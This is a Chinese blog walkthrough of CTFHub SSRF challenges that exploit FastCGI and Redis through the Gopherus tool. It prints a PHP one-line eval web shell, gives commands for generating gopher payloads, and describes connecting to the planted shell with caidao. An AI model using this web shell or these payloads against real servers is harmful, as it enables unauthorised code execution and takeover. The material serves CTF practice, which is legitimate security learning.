当前位置: 首页 > article >正文

CTFHub-FastCGI协议/Redis协议

article 2025/3/11 2:48:44

 将木马进行base64编码

<?php @eval($_GET[cmd]);?>

 打开kali虚拟机,使用虚拟机中Gopherus-master工具

Gopherus-master工具安装

git clone https://github.com/tarunkant/Gopherus.git

进入工具目录 

cd Gopherus

 使用工具

python2 "位置" --exploit fastcgi

 将得到的数据进行url编码

 放到url=后面得到图下代表成功

 打开文件,使用ls ../一级一级找flag

 使用得到的flag_得到

 打开kali虚拟机,使用虚拟机中Gopherus-master工具

python2 "位置” --exploit redis

 将结果进行url编码

将数据放到url=后面

显示504不重要,重要的是木马有没有写进去 

 出现这个表示写进去了

 使用caidao连接木马


http://www.kler.cn/a/579392.html

相关文章:

  • 行式数据库与列式数据库区别
  • 【渗透测试】基于时间的盲注(Time-Based Blind SQL Injection)
  • elasticsearch是哪家的
  • 物联网中如何解决网络复杂性的问题
  • 爬虫去重:数据采集时如何进行去重,及去重优化策略
  • 2025最新Postman、Apipost和Apifox API 协议与工具选择方案解析
  • PG vs MySQL 主从复制的异同点
  • hom_mat2d_to_affine_par 的c#实现
  • hadoop集群HDFS读写性能测试
  • 使用mergekit合并大型语言模型
  • 使用chroot预安装软件到ubuntu22中
  • 【学习笔记】【DeepSeek AI 医生】2-2 AI家庭医生课程内容介绍
  • vscode的终端无法运行vue或者node等命令解决方案
  • 在uni-app中使用SQLite实现离线下数据同步:从封装到实践
  • 框架基本知识总结 Day15
  • 字母异位词分组 力扣49
  • UI自动化测试Selenium安装教程(1)
  • 解决VScode 连接不上问题
  • Python Flask 使用不同的 HTTP 方法类型处理请求
  • 华为OD机试-数组去重和排序(Java 2024 C卷 100分)